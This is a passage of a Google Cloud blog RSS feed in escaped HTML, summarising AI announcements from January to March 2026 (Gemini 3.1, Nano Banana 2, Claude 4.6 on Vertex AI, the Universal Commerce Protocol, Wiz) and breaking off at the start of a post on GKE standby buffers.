&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/google-completes-acquisition-of-wiz?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Welcoming Wiz to Google Cloud: Redefining security for the AI era: &lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;Google has completed its acquisition of Wiz, a leading cloud and AI security platform. The Wiz team will join Google Cloud, and we will retain the Wiz brand. With the addition of Wiz, we will provide customers with a comprehensive platform to secure their cloud and hybrid environments, as well as accelerate threat prevention, detection, and response.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-flash-live/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini 3.1 Flash Live: Making audio AI more natural and reliable: &lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve improved 3.1 Flash Live’s overall quality, making it more reliable for developers and enterprises to build voice-first agents that can complete complex tasks at scale. On ComplexFuncBench Audio, a benchmark that captures multi-step function calling with various constraints, it scores 90.8%, ahead of our previous model.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;News you can use: &lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/ultimate-prompting-guide-for-nano-banana?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;The ultimate Nano Banana prompting guide:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This is a must-read for anyone working with Nano Banana. We spent weeks testing Nano Banana 2 and Nano Banana Pro against every use case we could imagine to find their limits. We put together this guide to share exactly what we learned and how you can get the best results. &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Here’s an example formula: [Reference images] + [Relationship instruction] + [New scenario]&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2_hJWjDOO.max-1000x1000.jpg"
        
          alt="2"&gt;
        
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/compute/training-large-models-on-ironwood-tpus?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;A developer’s guide to training with Ironwood TPUs&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this guide, we hear from Lillian Yu, CPA, CA, Product Strategy and Operation, and Liat Berry, Product Manager, on five strategies within the JAX and MaxText ecosystems designed to help developers refine training efficiency and hit peak performance on Ironwood hardware.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/how-to-build-ai-agents-with-google-managed-mcp-servers?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How to build production-ready AI agents with Google-managed MCP servers&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This guide is anchored on a specific example: Cityscape, a demo agent built with Google's Agent Development Kit (ADK) that turns a simple text prompt, like "Generate a cityscape for Kyoto", into a unique, AI-generated city image. Check out the guide to learn more. &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr/&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;February&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In February, we’re giving developers more reasoning power with Gemini 3.1 Pro and Claude 4.6, and faster creative scaling with Nano Banana 2. We’re also opening up new training programs and step-by-step guides to help you tackle the hardest parts of the AI lifecycle, from capacity planning to mounting defenses against AI-powered attacks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Here’s a rundown of our latest news, tools, and resources to help you build what’s next.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/bringing-nano-banana-2-to-enterprise"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Pro-level image generation gets faster and more accessible with Nano Banana 2&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; To build creative that stands out, you need models that naturally integrate into your workflows and scale with ease. Check out &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/bringing-nano-banana-2-to-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;our blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to see how this comes to life (and how customers are putting the model to work).&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/2_3KCMDRE.jpg"
        
          alt="2"&gt;
        
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-1-pro-on-gemini-cli-gemini-enterprise-and-vertex-ai"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Introducing Gemini 3.1 Pro on Google Cloud:&lt;/strong&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;Gemini 3.1 Pro is a clear step forward in reasoning, designed to solve tougher problems, giving you the reasoning depth your business needs. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini 3.1 Pro is available starting today in preview in &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. 
Developers can access the model in preview via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://developer.android.com/studio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://geminicli.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/expanding-vertex-ai-with-claude-opus-4-6"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Announcing Claude Opus 4.6 and Claude Sonnet 4.6 on Vertex AI:&lt;/strong&gt;&lt;/a&gt; &lt;span style="vertical-align: baseline;"&gt;Both models are now generally available on Vertex AI. Explore our &lt;/span&gt;&lt;a href="https://github.com/GoogleCloudPlatform/vertex-ai-samples/blob/main/notebooks/official/generative_ai/anthropic_claude_intro.ipynb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sample notebook&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to get started, and visit our &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai/generative-ai/pricing#claude-models"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;documentation&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for comprehensive pricing and regional availability details.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-new-ai-threats-report-distillation-experimentation-integration"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;New AI threats report: Distillation, experimentation, and integration&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;: John Hultquist, chief analyst, Google Threat Intelligence Group, details what security leaders should know from our newest AI threat report on experimentation, integration, and distillation attacks.&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you can use&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/a-devs-guide-to-production-ready-ai-agents"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;A developer's guide to production-ready AI agents&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;To help developers work through these challenges, we've published a collection of guides covering the full agent lifecycle. These resources first appeared during Kaggle’s &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/developers-tools/ai-agents-intensive-recap/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;5 days of AI Agents Intensive&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and they’ve proven so popular and useful, we wanted to make sure a wider audience had access, as well. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gear-program-now-available"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise Agent Ready (GEAR) program now available:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We opened the Gemini Enterprise Agent Ready (GEAR) learning program to everyone. As a new specialized pathway within the Google Developer Program, GEAR empowers developers and pros to build and deploy enterprise-grade agents with Google AI.&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/provisioned-throughput-on-vertex-ai"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Your guide to Provisioned Throughput (PT) on Vertex AI:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Check out this deep-dive blog on the resources available to you today on Vertex AI and how you can get started with capacity planning. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/transform/how-ai-can-boost-defenders-from-defense-in-depth-to-cyber-kill-chain-qa"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How AI can boost defenders, from defense in depth to the cyber kill chain (Q&amp;amp;A)&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;We know that defenders are also developing powerful AI tools. What’s still unknown is what it could mean for enterprise software ownership if companies have to constantly mount AI-directed defenses against AI-powered attacks.&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built. &lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;hr/&gt;
&lt;h2 style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;January&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We used to have to learn the language of computers. In 2026, they’re learning ours.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We kicked off the year by exploring the future of agentic commerce, where AI agents navigate the web to find and buy products for us. Our leaders call this the "&lt;/span&gt;&lt;a href="https://cloud.google.com/transform/the-invisible-shelf-retail-cpg-agentic-commerce-how-to?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;invisible shelf&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;" — a world where commerce isn't tied to a specific website. To make this reality scalable, we announced the Universal Commerce Protocol (UCP), a shared language that allows agents and retailers to understand each other. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We brought that same fluency to our creative and technical tools:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Updates to Veo 3.1 allow creators to use simple inputs — like reference images — to generate precise, mobile-ready video.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Natural language queries: With Comments to SQL in BigQuery, we’re removing the language barrier to data. Engineers can now write queries by describing their intent in natural language, prioritizing the question over the code.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Let’s dive in.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Top hits &lt;/span&gt;&lt;/h3&gt;
&lt;p role="presentation"&gt;1. &lt;a href="https://www.googlecloudpresscorner.com/2026-01-11-Google-Cloud-Brings-Shopping-and-Customer-Service-Together-with-Gemini-Enterprise-for-Customer-Experience" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise for Customer Experience (CX):&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Specifically built for agentic retail, this platform transforms fragmented search, commerce and service touch points into one seamless journey — whether you need a shopping assistant, a support bot, agentic search or help with merchandising. &lt;/span&gt;&lt;/p&gt;
&lt;p role="presentation"&gt;2. &lt;a href="https://developers.googleblog.com/under-the-hood-universal-commerce-protocol-ucp/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;We announced Universal Commerce Protocol (UCP):&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;A new open standard for agentic commerce that works across the entire shopping journey — from discovery and buying to post-purchase support. UCP establishes a common language for agents and systems to operate together across consumer surfaces, businesses and payment providers. So instead of requiring unique connections for every individual agent, UCP enables all agents to interact easily. UCP is built to work across verticals and is compatible with existing industry protocols like Agent2Agent (A2A), Agent Payments Protocol (AP2) and Model Context Protocol (MCP).&lt;/span&gt;&lt;/p&gt;
&lt;p role="presentation"&gt;3. &lt;a href="https://blog.google/innovation-and-ai/technology/ai/veo-3-1-ingredients-to-video/" rel="noopener" target="_blank"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;We updated Veo 3.1, including improvements to Ingredients to Video and Portrait mode:&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Veo is getting more expressive, with improvements that help you create more fun, creative, high-quality videos based on ingredient images, built directly for the mobile format. This includes:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Improvements to Veo 3.1 Ingredients to Video, our capability that lets you create videos based on reference images. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Native vertical outputs for Ingredients to Video (portrait mode) to power mobile-first, short-form video creation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;State-of-the-art upscaling to 1080p and 4K resolution for high-fidelity production workflows.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;These updates are launching in the Gemini app, YouTube, Flow, Google Vids, the Gemini API and Vertex AI.&lt;/span&gt;&lt;/p&gt;
&lt;p role="presentation"&gt;4. &lt;a href="https://cloud.google.com/blog/products/data-analytics/vibe-querying-with-comments-to-sql-in-bigquery?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Vibe querying with comments-to-SQL:&lt;/strong&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; Crafting complex SQL queries can be challenging. Often, engineers simply want to express their data needs in plain English directly within their SQL workflow. That’s why we’re introducing Comments to SQL in BigQuery. This feature makes writing queries using natural language – ‘vibe querying’ – a reality. Learn more in the &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/vibe-querying-with-comments-to-sql-in-bigquery?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;blog&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;News you &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;can&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; use&lt;/span&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/mastering-gemini-cli-your-complete-guide-from-installation-to-advanced-use-cases?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Mastering Gemini CLI: Your complete guide from installation to advanced use-cases&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We’ve teamed up with DeepLearning.ai and are excited to announce a free course – Gemini CLI: Code &amp;amp; Create with an Open-Source Agent. This course isn’t just for developers; we dive into practical use cases for various tasks such as data analysis, content creation, and personalized learning.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/how-google-sres-use-gemini-cli-to-solve-real-world-outages?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;How Google SREs use Gemini CLI to solve real-world outages&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this article, we’ll delve into real scenarios that Google SREs are solving today using Gemini 3 (our latest foundation model) and Gemini CLI—the go-to tool for bringing agentic capabilities to the terminal.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/blog/topics/developers-practitioners/getting-started-with-gemini-3-deploy-your-first-gemini-3-app-to-google-cloud-run?e=48754805"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Getting started with Gemini 3: Deploy your first Gemini 3 app to Google Cloud Run&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;In this blog, we show you how to vibe code your first app, which uses the Gemini 3 Flash Preview model, and deploy it to Google Cloud Run behind a publicly accessible URL. Google AI Studio lets you go from idea to app quickly by using natural language to generate fully functional apps with Gemini 3.&lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/blog/products/identity-security/cloud-ciso-perspectives-practical-guidance-building-with-SAIF"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;Practical guidance: Building with the Secure AI Framework (SAIF) on Google Cloud&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; We know that security and data privacy are the top concern for executives when evaluating AI providers, and security is the top use case for AI agents in a majority of industries. To help you build AI boldly and responsibly, here’s our guide to developing AI with the Secure AI Framework (SAIF) on Google Cloud. &lt;/span&gt;&lt;/li&gt;
&lt;li role="presentation"&gt;&lt;a href="https://cloud.google.com/transform/truths-about-ai-hacking-every-ciso-needs-to-know-qa"&gt;&lt;strong style="text-decoration: underline; vertical-align: baseline;"&gt;The truths about AI hacking that every CISO needs to know (Q&amp;amp;A)&lt;/strong&gt;&lt;/a&gt;&lt;strong style="vertical-align: baseline;"&gt;:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; How will AI boost threat actors? And what can chief information security officers do about it? Google’s Heather Adkins, vice-president, Security Engineering, explores how securing the enterprise is about to change.&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Stay tuned for monthly updates on Google Cloud’s AI announcements, news, and best practices. For a deeper dive into the latest from Google Cloud customers, read our monthly recap, &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/customers/cool-stuff-google-cloud-customers-built-monthly-round-up?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cool stuff customers built.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-related_article_tout"&gt;





&lt;div class="uni-related-article-tout h-c-page"&gt;
  &lt;section class="h-c-grid"&gt;
    &lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month-2025/"
       data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }'
       class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker"&gt;
      &lt;div class="uni-related-article-tout__inner-wrapper"&gt;
        &lt;p class="uni-related-article-tout__eyebrow h-c-eyebrow"&gt;Related Article&lt;/p&gt;

        &lt;div class="uni-related-article-tout__content-wrapper"&gt;
          &lt;div class="uni-related-article-tout__image-wrapper"&gt;
            &lt;div class="uni-related-article-tout__image" style="background-image: url('https://storage.googleapis.com/gweb-cloudblog-publish/images/monthly_ai_news.max-500x500.png')"&gt;&lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="uni-related-article-tout__content"&gt;
            &lt;h4 class="uni-related-article-tout__header h-has-bottom-margin"&gt;What Google Cloud announced in AI this month - 2025&lt;/h4&gt;
            &lt;p class="uni-related-article-tout__body"&gt;Learn about the latest announcements, innovations, and guides when it comes to Google Cloud AI.&lt;/p&gt;
            &lt;div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted"&gt;
              &lt;span class="nowrap"&gt;Read Article
                &lt;svg class="icon h-c-icon" role="presentation"&gt;
                  &lt;use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"&gt;&lt;/use&gt;
                &lt;/svg&gt;
              &lt;/span&gt;
            &lt;/div&gt;
          &lt;/div&gt;
        &lt;/div&gt;
      &lt;/div&gt;
    &lt;/a&gt;
  &lt;/section&gt;
&lt;/div&gt;

&lt;/div&gt;</description><pubDate>Mon, 01 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month/</guid><category>Google Cloud</category><category>AI &amp; Machine Learning</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/google_ai_this_month.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What Google Cloud announced in AI this month</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/google_ai_this_month.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/products/ai-machine-learning/what-google-cloud-announced-in-ai-this-month/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Andrea Sanin</name><title>AI Editor, Google Cloud</title><department></department><company></company></author></item><item><title>Introducing the GKE standby buffer: Improve node startup times without blowing your budget</title><link>https://cloud.google.com/blog/products/containers-kubernetes/gke-standby-buffers-speed-up-autoscaling-for-less-spend/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Application owners and platform engineers have long faced a difficult choice: spend excessively by over-provisioning to guarantee quick startups, or minimize costs but endure slow cold starts.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;We are excited to announce a way out of this trade-off: &lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt;Google Kubernetes Engine standby buffers. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;This builds on the launch of &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/containers-kubernetes/new-gke-active-buffer-minimizes-scale-out-latency"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GKE active buffers&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; earlier this year,&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; a native version of the Kubernetes &lt;/span&gt;&lt;a href="https://github.com/kubernetes/autoscaler/pull/8151/commits/0ffe04d1136f50eed0be6cd7910701bf3bacedcb" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CapacityBuffers API&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; that makes it easy to provision readily available capacity to handle traffic spikes, delivering near-zero startup latency for new pods. However, active buffers still impose a trade-off between performance and cost. New GKE standby buffers help by maintaining a low-cost, suspended capacity buffer for your GKE clusters. With a cost overhead in the low single-digit percent, GKE standby buffers help you achieve near-immediate scheduling for your workloads. This is useful for all kinds of workloads, from general-purpose to agentic.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/1_cMBIfl7.max-1000x1000.png"
        
          alt="1"&gt;
        
      
